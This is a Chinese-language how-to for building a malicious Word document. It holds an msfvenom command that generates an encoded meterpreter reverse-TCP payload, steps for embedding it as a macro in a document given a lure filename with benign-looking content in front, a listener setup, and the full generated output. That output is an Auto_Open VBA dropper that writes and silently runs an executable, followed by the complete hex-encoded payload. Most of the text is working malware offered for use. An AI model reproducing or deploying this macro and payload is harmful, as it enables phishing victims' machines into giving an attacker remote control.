########宿主机
┌──(root💀kali-linux-2021-3)-[~]
└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.211.55.6 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f vba-exe                                                  
具体内容在最下面

########win电脑（可以是靶机）
新建word
视图——宏
宏名：root（随意）
宏的位置：文档1（文档）  --文档1就是当前新建的文档
创建宏

把生成的Sub root（）
End Sub
代码复制过来

ctrl+s 保存
保存类型：启用宏的Word文档
文件名：root密码合集（随意）

内容粘贴那一堆乱码（Payload之下的）
PS：前面放正常内容

###########监听
msfconsole
#msfdb run












To use retry middleware with Faraday v2.0+, install `faraday-retry` gem
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai chosen with final size 624
Payload size: 624 bytes
Final size of vba-exe file: 20444 bytes
'**************************************************************
'*
'* This code is now split into two pieces:
'*  1. The Macro. This must be copied into the Office document
'*     macro editor. This macro will run on startup.
'*
'*  2. The Data. The hex dump at the end of this output must be
'*     appended to the end of the document contents.
'*
'**************************************************************
'*
'* MACRO CODE
'*
'**************************************************************

Sub Auto_Open()
        Etujg12
End Sub

Sub Etujg12()
        Dim Etujg7 As Integer
        Dim Etujg1 As String
        Dim Etujg2 As String
        Dim Etujg3 As Integer
        Dim Etujg4 As Paragraph
        Dim Etujg8 As Integer
        Dim Etujg9 As Boolean
        Dim Etujg5 As Integer
        Dim Etujg11 As String
        Dim Etujg6 As Byte
        Dim Eaqyiqqonl as String
        Eaqyiqqonl = "Eaqyiqqonl"
        Etujg1 = "BnOINmLy.exe"
        Etujg2 = Environ("USERPROFILE")
        ChDrive (Etujg2)
        ChDir (Etujg2)
        Etujg3 = FreeFile()
        Open Etujg1 For Binary As Etujg3
        For Each Etujg4 in ActiveDocument.Paragraphs
                DoEvents
                        Etujg11 = Etujg4.Range.Text
                If (Etujg9 = True) Then
                        Etujg8 = 1
                        While (Etujg8 < Len(Etujg11))
                                Etujg6 = Mid(Etujg11,Etujg8,4)
                                Put #Etujg3, , Etujg6
                                Etujg8 = Etujg8 + 4
                        Wend
                ElseIf (InStr(1,Etujg11,Eaqyiqqonl) > 0 And Len(Etujg11) > 0) Then
                        Etujg9 = True
                End If
        Next
        Close #Etujg3
        Etujg13(Etujg1)
End Sub

Sub Etujg13(Etujg10 As String)
        Dim Etujg7 As Integer
        Dim Etujg2 As String
        Etujg2 = Environ("USERPROFILE")
        ChDrive (Etujg2)
        ChDir (Etujg2)
        Etujg7 = Shell(Etujg10, vbHide)
End Sub

Sub AutoOpen()
        Auto_Open
End Sub

Sub Workbook_Open()
        Auto_Open
End Sub

'**************************************************************
'*
'* PAYLOAD DATA
'*
'**************************************************************

Eaqyiqqonl
&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H80&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H50&H45&H00&H00&H4C&H01&H03&H00&H22&HFC&H3A&HEA&H00&H00&H00&H00&H00&H00&H00&H00&HE0&H00&H0F&H03&H0B&H01&H02&H38&H00&H02&H00&H00&H00&H0E&H00&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H10&H00&H00&H00&H20&H00&H00&H00&H00&H40&H00&H00&H10&H00&H00&H00&H02&H00&H00&H04&H00&H00&H00&H01&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H02&H00&H00&H46&H3A&H00&H00&H02&H00&H00&H00&H00&H00&H20&H00&H00&H10&H00&H00&H00&H00&H10&H00&H00&H10&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H30&H00&H00&H64&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2E&H74&H65&H78&H74&H00&H00&H00&H28&H00&H00&H00&H00&H10&H00&H00&H00&H02&H00&H00&H00&H02&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&H60&H2E&H64&H61&H74&H61&H00&H00&H00&H90&H0A&H00&H00&H00&H20&H00&H00&H00&H0C&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&HE0&H2E&H69&H64&H61&H74&H61&H00&H00&H64&H00&H00&H00&H00&H30&H00&H00&H00&H02&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H30&HC0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HB8&H00&H20&H40&H00&HFF&HE0&H90&HFF&H25&H38&H30&H40&H00&H90&H90&H00&H00&H00&H00&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HBF&H38&H3A&H79&H9A&HDB&HDE&HD9&H74&H24&HF4&H5A&H33&HC9&H66&HB9&H04&H02&H31&H7A&H15&H83&HC2&H04&H03&H7A&H29&HD8&H8C&HAB&H89&H74&H67&HDC&H49&H85&H13&H23&H79&HE1&H52&HFB&HC7&H43&H7C&H2B&H39&H4F&HAB&H0A&H31&H4B&HA0&HF0&H90&H5A&HF9&H9D&H61&H99&HFE&H90&H10&H2D&HFC&HA7&H7F&HCB&H20&H9C&H0B&H0F&H9D&HD1&H81&H24&HC2&HC4&HF6&H71&H06&H14&H52&HC7&H82&H4C&HF4&H74&HE5&H83&H47&HB9&HB9&H4F&HB4&H55&H41&HB4&H51&H8D&HAB&HE5&H70&HFD&H3B&HF7&HB9&H8A&H62&HD8&H4D&H88&H6E&H4B&HA4&H49&HD8&HAD&H3F&H16&H63&HBC&HB6&H74&H06&H7F&HAD&HB5&H34&H6D&H7F&HB6&HAD&HD1&HC1&H86&HB7&H06&HDB&H3B&HCD&H66&H30&HDC&HB3&HA1&H46&H0D&H1E&HAC&HF9&H70&HD8&HC3&H59&HD0&HE2&H7C&HC6&H44&H75&H26&H53&H04&HE0&H7C&H3F&H39&HEF&H13&H46&H5A&HC1&HD6&H28&H1D&H60&HEE&HA6&HD2&H22&H4B&HF1&H20&H15&HB7&HEF&H1A&HB3&H2F&H3F&H84&HF6&HA0&HBD&H80&H08&H7C&H29&H0A&H9B&H67&HEE&H72&HD4&H4C&H40&HA5&H0B&H94&H99&H23&HE1&H57&H59&HD6&HC9&H03&HEA&H77&HF7&H40&H47&H63&H4B&H9B&H99&H51&H8E&H4D&HBB&H50&H02&HCF&HDC&H64&H71&H2E&H71&H97&HB3&HEC&H25&H1D&H4E&H33&H96&H47&HB9&H28&HA5&H20&H23&HA5&H61&HD4&HBC&H3B&H98&HDA&H57&H09&H40&H6D&H91&HDC&H1D&H4C&H06&H5B&H8D&H72&HCE&HCF&H52&HA7&HBC&H35&H96&H64&H5C&H0D&H35&HF6&H99&H27&H49&HD0&H73&H17&HCC&H7B&H4A&H7A&H3A&H61&HA6&HF1&H80&H7C&H53&H57&H32&HC3&H7A&H10&HFE&HE2&HD1&HC7&H89&HCE&H4F&HB3&H62&H14&HEA&HDF&H3B&H09&HE3&HE3&H06&H35&H8E&H80&H15&H0A&HDA&HF4&H6C&H19&H9F&HC4&H7C&H9A&HE1&H25&H62&H0B&H25&HA4&H14&H6D&HF4&H2F&HAC&H6E&HD8&HE3&HA4&HE2&H6C&HBC&H15&HB0&HF9&HE6&H32&H65&H39&H82&H3D&HEB&H5C&H10&HD1&H7D&H29&H4C&HD5&H42&HF8&HD6&HF5&H8B&H72&H5E&H0A&H47&H38&H0B&H92&H39&HF1&HED&H28&H84&HC0&H52&HF5&H7D&H49&HF1&H74&H63&H55&H4A&HA7&H38&H4C&H18&H90&H1D&H32&H12&H7A&HCE&HCE&H8F&HEA&H15&HBE&HDC&H2B&H01&H71&H02&HB8&H3A&HBF&H20&H38&HFB&HE6&H82&H35&H7D&H49&HCE&H41&HC7&HE2&H2C&HE5&H89&HF0&HA6&H16&H5D&HDB&H1C&HC9&H98&H17&HCB&H96&H31&H76&H1E&HDE&HE1&H48&HF9&H81&H7E&H6E&H39&H08&H81&HB0&H83&H61&H1F&H73&HB8&H9F&HAB&H32&H4A&HB7&H15&H3B&H86&H42&HD3&HC9&HAD&HCF&H1F&H1A&HBE&H1B&H10&H45&H90&H3C&HD3&H66&HB3&HCB&HB0&H71&HA3&H7F&HFD&HAA&H85&H83&HD0&H4B&HA9&H3D&H74&H5F&H14&H88&HC9&HBD&HE6&HF6&H8B&H34&H0D&H14&HEB&HC8&H95&H2E&H18&H83&HFB&H44&HD4&HDC&H95&H04&HBE&HD9&HF9&HF7&HB1&H2F&HAE&H2C&H79&H82&HFD&HB7&H93&H14&H65&HFC&H59&H0C&H2B&HA7&H09&H1D&H23&H64&H16&H14&H2C&H41&H92&HBF&H14&H93&HFF&H53&H6A&H47&HA4&HB6&HE6&HA7&HE4&H1D&H3C&H99&H04&HA4&HD8&H9D&H90&H66&HEF&H29&H7C&H19&H57&HA3&H61&H34&HEC&H5E&H96&HCA&HBF&H4C&H3F&HF0&HC2&H00&H73&H48&HBF&HF6&H5B&H4B&H6A&H93&H42&HCE&H0F&HEB&H1A&H84&HE4&HC6&H90&H6B&H5C&H0E&HDA&H00&H57&H00&HE4&HBD&HC9&H90&H73&H03&H89&H01&H8D&H86&HDB&H94&HE0&HBC&H3A&HBA&HE5&H1A&H79&H70&H1F&HD8&H6A&H89&HFC&H36&H5F&H2E&HE9&H03&HB4&H1B&H61&HC1&HEB&HD5&HE5&H73&HBC&H2C&H4E&HD2&H8F&H7D&HDA&H73&H0C&HEA&HA4&H17&HDE&H0E&HFA&H3B&H2B&HA3&HE5&HC0&H7A&H54&H1C&H56&HC7&H57&H6A&H71&H9D&H08&H85&H6E&H92&H39&H49&HDD&H7C&H8A&HD2&HB8&HFF&H19&HA9&H9F&HF2&HE8&H7E&HB9&H33&HFF&H35&H1D&H66&H51&H97&H98&H4E&H7D&H6F&H27&H4C&HBC&HFD&HCB&H15&H60&H3B&H04&H4F&H32&HD3&HFB&H6E&H0D&HED&H79&H75&HF3&HE7&HDB&H76&H4B&H18&H13&H68&HEB&H4E&HAF&HFF&H5B&H21&H90&H10&HEB&HEF&H3A&HC8&H17&H96&H42&H22&HB9&H48&HD3&H3E&H62&HE4&H54&H69&H83&H1F&HA3&H22&H02&H56&H1F&H09&H80&H97&H53&H3E&H3B&H4E&H7B&HB7&HE3&H7F&HDC&H44&HCE&H65&H71&H59&H52&HD2&H85&H0E&H09&H01&HFB&H75&H0E&H1F&H91&H60&H57&HED&H60&H94&H0F&H47&H20&H05&H8A&HC9&HFA&HF5&H68&H11&HA7&HD9&H0B&H30&H5A&H91&H92&HFC&H28&H94&H83&H84&H9F&H08&HB5&H1C&HD1&H35&HCA&H98&H94&HEE&HBB&HCB&HF9&HBD&H40&HC9&HBE&H3F&H01&H05&HC6&H99&H8A&H0D&H7A&HB1&H5E&H77&H6D&H22&HD4&H06&H26&HFB&HB0&HEC&H5B&H68&HA6&H56&H0E&H32&H97&H2C&H17&H68&H57&HB3&H31&H3C&HCB&H3D&H3A&HA0&H2A&H15&H05&H83&HE7&HAB&H81&H4F&H19&H72&H4A&HC9&H09&H1C&H1E&H25&H56&HBE&H69&H28&H5A&H21&HD6&H07&H33&HC6&HBB&H0A&H74&HF1&HB2&HBA&H48&HE8&H6D&HC0&H80&H1A&HB6&H33&H81&HAA&H26&HC8&H5E&H72&HB7&H34&H82&H99&H8A&H7E&HAC&H31&HB9&HD7&H62&H4E&H97&H9F&H6B&HB6&H23&H0B&HC7&HB0&HB4&H83&H60&H68&H74&HBA&H2D&H89&HA0&H21&H83&HCF&H2C&HE1&H04&H52&HBF&HDD&H6E&HDA&H56&H5F&H77&H0B&H33&HC3&H54&H9C&HA2
&HC9&HE6&H90&H5B&H88&HD5&H13&H1E&H98&H31&H2F&HD4&H67&HFE&HD4&H55&HAD&H0B&HA1&H61&HAD&HC0&HEA&H68&HA3&H77&H06&HE2&H48&HE7&HE1&H92&H9B&HC2&HBA&H35&HB7&HA5&H3B&H07&H5B&H6F&H6D&H4E&HEE&H22&H5F&H7E&HEE&H82&H37&H25&HD8&HB9&HB3&H53&H99&H51&HB9&H88&HBE&H6D&H00&H55&H86&H4B&H26&H7C&H20&HD5&H36&HE3&H40&H50&HAD&H08&HD6&H53&H84&H96&H6E&H84&HEF&H63&H5B&HEC&HF2&H31&HB0&H49&H43&HEE&HAF&H00&H6E&H6D&HE8&HDC&H1A&H8E&H46&H97&HE3&HE1&H4B&H33&H2D&H5B&H61&HEF&H09&H9A&H22&H94&H6B&HED&H7A&H4D&HD4&H91&H0B&H52&H9A&H48&H7C&H1C&H23&H0E&HB6&HED&H6E&HF8&H05&H6A&HA9&H6D&HE9&HCF&H97&H07&HC0&H6C&HC1&H59&H3F&H51&H0D&HAA&HAF&H49&H87&H2F&H5A&H70&H1C&HF4&H47&H4D&HF3&H0C&HBA&HC1&HFA&H7D&H51&H7C&H92&H52&H49&HD2&H31&HC0&HB6&H90&H42&HDF&HE3&H57&H57&H0C&HD8&H80&HB2&H0C&H36&H84&HEF&H2E&H1A&HED&H93&H1D&HD4&H42&HC1&H3B&HB6&H41&HDD&H79&H04&H2D&H1D&H0A&H37&H8A&HE9&HB4&HAA&HDA&H54&H7E&H80&H4F&H4C&H01&HD6&H61&H50&HF5&HDD&HBF&H01&H9B&HCE&H94&HBE&H33&HF0&HA4&H0E&H23&H10&HDF&HED&H40&H4C&HBD&HA3&H1E&H34&HD9&HDD&HC0&H81&H40&H05&H0A&H88&H3F&HFD&H18&H18&H2B&H21&HBB&H99&H39&H4D&H30&H32&H69&H06&HC5&H3F&HBB&HD7&HC4&HFF&H85&H1D&H45&HC7&H61&HF4&H49&H75&H03&HC2&HCA&HCC&H90&H8F&H8D&HB3&H14&HC0&H12&HCA&H1F&H00&H3C&HD8&HAC&H55&HE8&H1B&H0C&H53&HCA&H1F&H02&H4F&H7A&H28&HC1&HAC&H7F&H26&H1D&H9E&HB8&H4A&H5F&H87&HDB&HA6&HDE&H8D&H5D&H5D&H55&HE8&HAE&H51&H8F&H28&H8E&H8A&H9D&HB7&H51&HDC&HDF&H09&H14&HB8&H33&H8B&H55&H86&HB8&HB5&HD6&H8D&H1D&HD4&H18&H17&HFF&HC8&HF6&H1F&HF4&HC0&H85&H19&H3B&H9F&H18&HEE&HAC&H17&H00&H67&H3A&H50&H4C&HE0&HFF&H1C&HD7&H63&H2B&HB3&H33&HF3&H12&HDB&HCB&HA0&H06&H15&H22&H32&HFC&H2E&H03&H02&H11&H34&H4D&HDB&H1F&H39&H46&H81&H5C&HF7&HEC&HBE&HB6&H93&HEE&H0C&HB6&H6F&H53&HA4&HB4&H9E&H94&H1F&H84&H36&H04&H20&HC4&H10&H9A&H53&H0B&HC3&H1D&HD2&H0F&HAF&H49&H61&H8B&HA9&H4D&HD2&H81&H0E&H97&H2E&HFE&H6E&H57&HF4&H47&HC5&H5D&H96&HD5&HFD&H6A&H3D&H14&HA7&HB9&HB5&HD1&HC5&H06&H47&HA2&H3F&H54&H90&H06&H49&HD4&H5A&H3B&HC5&HA7&H6B&HB5&H06&H5A&HC4&HD7&HE8&H88&H5A&H66&HC5&H02&H44&H5F&H3B&H73&H92&HC1&HFD&H20&H03&H14&H1E&H01&H24&H23&HA0&HDE&HAB&H46&H32&H79&HEF&HAE&HA3&H6A&H13&HB1&H52&H4C&HF8&H4D&H94&HC0&HCC&HEF&H0A&HAB&H3D&H89&H24&HA2&H8D&HE5&H67&H17&HA9&H9C&H11&HA6&H27&H99&H7E&H03&H30&HBC&HDF&H6D&H20&H82&H45&HA7&HF8&H62&H30&HBA&H13&HA9&H7B&H53&HB7&H7B&H84&HE5&HA0&H31&H9E&H35&H56&H68&H9C&H07&H54&HDD&H45&H32&H2F&H30&H3A&HB7&H74&H43&HC6&H64&HCD&H2F&HEB&H88&HD5&H6B&H04&HD3&HF3&HD7&H03&H80&H95&HCC&H89&HBE&HCA&HEE&HEB&HEA&HBB&HA6&HA0&H7C&HDB&HF5&HB4&H32&H4A&H58&HD7&H9B&H06&H0C&HA2&HBC&HA2&H88&HDE&HBC&H7E&H68&H4A&H8C&H53&H89&H3E&H09&HD3&H16&HC5&H32&H2D&H5B&H46&H6A&HC7&H81&H02&H24&H65&H38&H38&HE6&H4B&H7D&H70&H5A&HA3&HEC&H67&H2F&H83&H20&HB9&HE4&HD5&H42&HE7&H0B&HF9&H99&H3D&HF8&HDA&HFF&HEC&H88&H6B&HC3&H9D&HF8&HB7&H5E&HED&H52&HC6&H9D&HE6&H78&HF1&H6F&H89&H5E&H2C&H47&H5F&H4C&H4F&HA2&H39&HB0&HCD&HE9&H0F&H44&H05&H9E&HCD&H0B&HEE&H13&HE7&HFA&HE0&H91&H03&HAA&H97&H83&H45&H1F&H7E&H02&H81&H73&H07&H76&H92&H9D&HCF&H42&HFC&H94&H37&HC6&H59&H4B&HDF&H44&H96&HFD&H68&H99&H2E&HC1&H9A&HF4&H9F&H0C&H78&H51&H8A&HE3&H29&H92&H60&H2B&H1D&HEC&H53&HD1&H92&H46&HC7&H97&H90&H5F&H95&H31&H24&HD4&HC3&HAD&H45&HAA&H53&H70&H49&H61&H39&HB9&H65&H25&HF7&H98&H0C&H68&HCF&H3F&HE5&H05&HDF&HAB&H01&H03&H10&H77&HF9&H27&HCE&H99&H49&HA4&H11&H2E&HD3&HBA&H33&HA7&HC7&HD1&H46&H0B&H2C&H31&HD9&H5F&H87&H76&HCC&H35&H03&H01&HB6&HC3&H21&HFC&H86&HAD&H9B&HE7&H95&H89&HA5&H21&HFB&HC9&HA2&H13&H6B&H21&H33&H16&H56&H23&H9E&HCA&H61&HBB&H61&H74&H76&H5B&H3B&HC5&HB2&HEB&HA8&H2E&H32&HD6&H8D&HD1&HDF&HDD&H31&H10&H54&H43&H33&H24&H60&H93&H0D&HE7&H5B&HEE&H58&H3D&H83&H7F&H4A&H90&H3C&HA9&HD6&H4C&HF4&H19&HE8&H7E&H88&H83&H2D&HA5&HB2&H83&H68&HD8&H6B&HD0&H8E&HA2&HF7&HD8&HC0&HDA&H26&H2C&H69&H39&H9A&H84&H75&H50&HBB&HB9&HA2&H0D&H1F&H43&HCE&H57&H18&H57&H74&HB6&HB9&HA5&HD6&HA7&H26&HBF&HC3&HF0&HB1&HFA&H81&HAA&HCB&HA3&H96&H91&HEA&H1D&HE8&H1C&H42&HA6&H8D&H78&H11&H58&H7D&H02&HD6&H8C&H65&HA3&H27&HCC&H1B&HDA&H2E&H70&HF4&HEA&H0B&H8E&HEC&H97&H8E&HE5&HF5&H22&H07&H10&H22&H93&H9E&H94&H76&H24&H44&HEE&H95&HD8&H0E&HEB&H34&HA3&HFB&H79&H11&H5A&HEB&H0D&H20&H7F&H6F&HD5&HE6&H51&H07&H7E&H9B&H92&H38&HA6&HC7&HFA&HF2&H08&HC1&HA3&HD6&HD8&HBB&HE1&H9E&HC5&H5F&H53&H0D&HB5&HD9&H9D&H9C&HCC&HE5&H46&H16&HC4&H81&H76&H83&HBE&H7D&H16&H15&HC8&H9B&H0C&H52&HF1&H9E&H57&HB4&H01&HE6&H7F&HAA&H5B&H09&H32&H7A&H55&H28&HD1&H1A&HD4&H79&H87&HFA&H08&HFE&HB2&HDB&H34&H96&H39&HAD&HC4&H48&H4D&HD4&HBB&HF8&H6D&HBE&HF6&H4F&H0E&H33&HEE&H62&H76&HFB&HBF&H37&HD8&H5B&H03&H47&H84&H7C&HBA&H37&H76&HF2&HE7&HAE&H63&H9B&HDF&H67&H54&H95&H1F&HD6&HC7&H6E&HAD&HBD&HCE&H47&H63&H03&H4F&HE3&HFC&HCF&H87&HE6&H51&H14&H0F&H42&HC4&HE5&H09&HDC&H60&HB7&H90&HEB&H3F&H61&HFD&HFE&H51&H2D&HE8&HE5&H42&HBB&H01&H4F&HA3&H0B&HCA&H27&H25&HE1&H0F&HEB&H28&H03&H01&H70&H2E&HCB&H6E&H60&HF0&H63&H2D&H7E&H70&HEE&H66&HB2&H14&HE5&H73&HE8&H27&HC3&H1B&HC3&H9B&H9E&HAA&H8A&H8B&H8C&H2F&H81&H3D&H65&H19&H69&HB8&H86&HF7&HCE&H12&H4A&H34&H95&HA6&H77&H54&H6B&H58&H52&H71&H1A&H72&HC5&HA1&H5F&H75&H1E&H1D&HAC&HED&H05&H1E&H7E&H68&HF4&HCA&HF5&H4F&HEE&H87&H2B&H5F&HF0&HF4&HF6&H72&H2D&HF8&HED&HBF&H02&HB2&H38&H3F&H88&H49&HBA&HDD&HA1&HE1&H92&H37&HC9&HD8&H4A&H5F&H7D&HDF&HA1&HA2&HCC&H74&H7A&HC7&HFC&H7A&HDB&HF5&HE3&H7F&HFE&HA9&HCB&H61&H11&H0C&H33&H9A&HB3&H2B&HA3&H19&H49&H79&HF7&H5A&H93&HD5&HE9&H1E&HFC&HAC&H51&H6C&HD7&H1C&HF7&HE5&H6B&H82&H29&HC9&H2C&H65&HA6&HA6&HC2&H09&H25&H33&H70&H10&H08&H2C&H2D&H4F&H24&HED&HF0&HEA&HE9&H4C&HBB&H5C&H52&H66&H73&HDB&HFF&H59&H3C&H20&HD8&H39&HD6&H57&H8F&HF4&H9B&H1B&HD0&H85&H72&H09&HA0&H29&H51&H57&H3A&H4A&H43&H55&H32&H02&HF0&H6F&H58&H28&H54&H79&HA4&H5F&HCA&HD8&HE4&H0F&H93&HC6&H4C&HF4&HF5&H1E&H64&H2D&H09&HBE&H04&H75&H30&H40&H02&H20&H10&H07&HEC&HBF&HD6&H5D&H85&HA3&HC0&HAB&H09&HEE&H94&HF2&H40&HDD&H06&HF7&H47&H9D&HDE&HE6&H2D&HAD&H8B&HA7&H33&H90&HA9&HB2&H5F&H9E&H49&H9E&HBE&H4F&HBE&HE7&H05&H8E&H8F&HCE&HFA&HAF&H7D&H81&HC0&HFA&HCC&H05&H91&H1D&H19&HCB&H23&H6C&HE0&HDE&HE7&H19&H16&H54&H7F&HC8&HA7&HCF&H58&H2C&HD1&H80&H19&H3B&H35&H6F&H7B&H3B&H54&H87&HD1&H5F&H41&HDD&H30&H97&H09&H99&HE3&HC2&H9F&HAE&HFD&H57&H23&H31&HC4&HD7&H3B&H26&HE4&H50&HD3&HE8&H2D&HF4&HD0&H16&H3A&H05&H3B&H6F&HCF&H93&H2B&H3B&H9D&HAD&HC2&HAD&HC6&H57&H1F&H8A&H97&HC4&HAD&HFB&HCA&H91&H38&HAE&HA2&H3F&HB6&HF2&HC5&HA9&HA5&HA1&HD1&H83&H1B&HD3&HEA&H19&H17&H92&H49&HC7&H78&HCD&H27&HD4&H56&H2E&HB3&HAC&H16&HEC&H49&H8F&H59&HD9&H01&HC4&H5C&HCC&H68&H38&HAC&HAE&H3D&HE3&H54&HD3&H70&HC7&HCB&H82&HF0&HA1&HAF&H8D&HB1&HDD&HB3&H9F&HD7&H7A&H47&HFC&HC7&H36&H46&HBA&HD6&H24&HBA&H5F&HB9&H7F&H92&HA1&H6E&HE1&HC3&HB8&H1C&HE5&HA4&H23&HEA&H4A&H8E&HE0&HFC&H79&HF1&HA0&H54&H61&HFF&HE1&H4A&HCF&H06&H3B&H36&H0D&H94&H36&H8A&H4D&H39&HEA&H12&HDC&HBA&H75&HB8&H6F&HE1&H6A&HF5&H77&H65&H11&H4A&H8C&HA6&HE7&H11&H87&H03&H38&HE5&HFF&H3E&H7C&H15&H2D&HFD&H19&H87&H91&H15&HCB&H03&H22&H50&HE3&HFF&HCF&HB3&H69&HEC&HE3&H40&HAE&H57&H90&HDF&H7E&H87&H97&H63&H47&H57&HC2&HAE&H88&HA4&H01&H65&H79&HD6&HAF&H4B&H9E&HA4&H65&H08&H06&H5E&H46&H97&H91&H6D&H8D&H07&HFA&H88&HF2&HF1&H78&HEE&H69&H5C&HED&H4F&H5F&HB3&H90&H2B&HFE&H14&HE5&H92&HF1&HE8&HB8&HAA&HB8&H88&HA1&H46&H5A&HCE&HAC&H7C&H7C&HC6&H30&H74&H58&H88&H9C&HD9&HB7&H0D&H1E&H77&H92&HAE&HB4&H89&HEE&H2F&HEC&H3E&HE0&H6A&HDB&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00